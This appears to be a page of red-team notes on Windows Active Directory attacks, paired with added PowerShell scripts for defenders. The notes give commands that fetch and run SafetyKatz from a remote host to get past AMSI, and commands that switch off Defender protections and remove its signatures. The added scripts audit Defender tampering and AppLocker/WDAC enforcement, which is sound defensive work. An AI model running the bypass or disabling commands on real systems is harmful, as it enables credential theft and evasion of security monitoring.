notes

Tools

https://github.com/Raptoratack/ADTools

Bypass AMSI

Bypass AMSI- and ETW-based detection by loading the binary with the loader utility

C:\Users\Public\Loader.exe -path http://10.10.10.10/SafetyKatz.exe
C:\Users\Public\AssemblyLoad.exe http://10.10.10.10/Loader.exe -path http://10.10.10.10/SafetyKatz.exe

Bypass Real-Time-monitoring

powershell Set-MpPreference -DisableRealtimeMonitoring $true
powershell Set-MpPreference -DisableIOAVProtection $true
powershell Set-MpPreference -DisableAutoExclusions $true
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
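Each of the commands above leaves a readable trace in Defender's own configuration and event log, so the same settings are what a tamper audit should watch. The following is an added example written for this page, not a tool from the linked repository: it reads the live preferences with the Defender module (Get-MpPreference / Get-MpComputerStatus), flags the weakened switches and missing signatures, and pulls the Operational-log events that record the change. It assumes the Defender PowerShell module is present and the shell has administrator rights.

```powershell
# Added example (not part of the original notes): audit Microsoft Defender for the
# tampering shown above. Assumes the Defender module is available and the session
# is elevated; otherwise Get-MpPreference may fail with access denied.

function Test-DefenderTampering {
    [CmdletBinding()]
    param()

    $pref   = Get-MpPreference
    $status = Get-MpComputerStatus
    $findings = @()

    # Each check maps one Set-MpPreference switch to the property that exposes it.
    if ($pref.DisableRealtimeMonitoring) { $findings += 'Real-time monitoring is disabled' }
    if ($pref.DisableIOAVProtection)     { $findings += 'IOAV (download/attachment) scanning is disabled' }
    if ($pref.DisableAutoExclusions)     { $findings += 'Automatic exclusions are disabled' }

    # MpCmdRun -RemoveDefinitions -All leaves the engine with no definitions at all.
    if (-not $status.AntivirusSignatureVersion -or $status.AntivirusSignatureVersion -eq '0.0.0.0') {
        $findings += 'No antivirus signatures loaded'
    }
    if ($status.AntivirusSignatureAge -gt 7) {
        $findings += "Signatures are $($status.AntivirusSignatureAge) days old"
    }

    # Tamper Protection stops Set-MpPreference from turning these features off in the first place.
    if (-not $status.IsTamperProtected) { $findings += 'Tamper Protection is off' }

    # Exclusions are where a dropped loader is typically hidden; list them for review.
    foreach ($p in @($pref.ExclusionPath))      { if ($p) { $findings += "Path exclusion: $p" } }
    foreach ($e in @($pref.ExclusionExtension)) { if ($e) { $findings += "Extension exclusion: $e" } }
    foreach ($x in @($pref.ExclusionProcess))   { if ($x) { $findings += "Process exclusion: $x" } }

    [pscustomobject]@{
        ComputerName     = $env:COMPUTERNAME
        RealTimeEnabled  = $status.RealTimeProtectionEnabled
        TamperProtected  = $status.IsTamperProtected
        SignatureVersion = $status.AntivirusSignatureVersion
        Findings         = $findings
    }
}

# The Windows Defender Operational log records every preference change (5007),
# real-time protection being switched off (5001) and scanning being disabled
# (5010, 5012). Pull the recent ones so the audit result can be tied to a time.
function Get-DefenderTamperEvents {
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5001, 5007, 5010, 5012
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, Message
}

Test-DefenderTampering
Get-DefenderTamperEvents -Hours 24
```

An empty Findings list together with TamperProtected = True is the expected baseline; anything else is worth correlating with the 5007 events, which name the exact setting that was changed and the value it was changed to.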

Bypassing AppLocker & WDAC

Check whether PowerShell is running in Constrained Language Mode (this may be caused by AppLocker or WDAC)

$ExecutionContext.SessionState.LanguageMode

Check the AppLocker application-whitelisting policy via PowerView and the registry (reg.exe)
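The language-mode check and the SrpV2 registry lookup above are also the quickest way for an administrator to confirm that AppLocker or WDAC is genuinely enforcing on a host rather than merely configured. The script below is an added example written for this page (it is not PowerView and not part of the linked repository): it reports the session language mode, each AppLocker rule collection with its enforcement mode, the effective policy XML, the AppIDSvc state and the WDAC enforcement status from Win32_DeviceGuard, then warns when script rules are enforced yet the current session is not constrained. It assumes the AppLocker module exists on this edition of Windows and that the policy key is readable.

```powershell
# Added example (not from the original notes): report whether AppLocker / WDAC are
# actually enforcing here and whether PowerShell is therefore in Constrained
# Language Mode. Assumes the AppLocker module and DeviceGuard WMI namespace exist.

function Get-CodeIntegrityPosture {
    [CmdletBinding()]
    param()

    # FullLanguage means no restriction; ConstrainedLanguage is what AppLocker/WDAC impose on scripts.
    $langMode = $ExecutionContext.SessionState.LanguageMode

    # AppLocker rule collections (Exe, Script, Msi, Dll, Appx) live under SrpV2, each with
    # an EnforcementMode DWORD: 0 = not configured, 1 = enforce rules, 2 = audit only.
    $srpKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2'
    $collections = @()
    if (Test-Path $srpKey) {
        foreach ($coll in Get-ChildItem $srpKey) {
            $mode = (Get-ItemProperty $coll.PSPath -ErrorAction SilentlyContinue).EnforcementMode
            $label = 'NotConfigured'
            if ($mode -eq 1) { $label = 'Enforce' } elseif ($mode -eq 2) { $label = 'AuditOnly' }
            $ruleCount = (Get-ChildItem $coll.PSPath -ErrorAction SilentlyContinue | Measure-Object).Count
            $collections += [pscustomobject]@{
                Collection  = $coll.PSChildName
                Enforcement = $label
                RuleCount   = $ruleCount
            }
        }
    }

    # Effective policy as the AppLocker module computes it (local policy merged with GPO).
    $effectiveXml = $null
    if (Get-Command Get-AppLockerPolicy -ErrorAction SilentlyContinue) {
        $effectiveXml = Get-AppLockerPolicy -Effective -Xml
    }

    # Rules only apply while the Application Identity service is running.
    $appIdSvc = Get-Service -Name AppIDSvc -ErrorAction SilentlyContinue
    $svcState = 'NotInstalled'
    if ($appIdSvc) { $svcState = $appIdSvc.Status }

    # WDAC: Device Guard exposes code-integrity enforcement as 0 = off, 1 = audit, 2 = enforced.
    $dg = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $wdacLabel = @{ 0 = 'Off'; 1 = 'Audit'; 2 = 'Enforced' }
    $wdacKernel = 'Unknown'
    $wdacUser   = 'Unknown'
    if ($dg) {
        $wdacKernel = $wdacLabel[[int]$dg.CodeIntegrityPolicyEnforcementStatus]
        $wdacUser   = $wdacLabel[[int]$dg.UsermodeCodeIntegrityPolicyEnforcementStatus]
    }

    [pscustomobject]@{
        LanguageMode          = $langMode
        AppIDSvcStatus        = $svcState
        AppLockerCollections  = $collections
        AppLockerEffectiveXml = $effectiveXml
        WdacKernelMode        = $wdacKernel
        WdacUserMode          = $wdacUser
    }
}

$posture = Get-CodeIntegrityPosture
$posture | Format-List

# Script rules enforced but a FullLanguage session is a finding: either the session was
# started outside the rules or AppIDSvc is not running and the policy is not applied.
$scriptEnforced = $posture.AppLockerCollections |
    Where-Object { $_.Collection -eq 'Script' -and $_.Enforcement -eq 'Enforce' }
if ($posture.LanguageMode -eq 'FullLanguage' -and $scriptEnforced) {
    Write-Warning 'Script rules are enforced but this session is not in Constrained Language Mode'
}
```

Run it once from a normal user session and once elevated: AppLocker does not constrain administrators by default, so a FullLanguage result in the elevated run is expected while the same result for a standard user indicates the policy is not taking effect.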
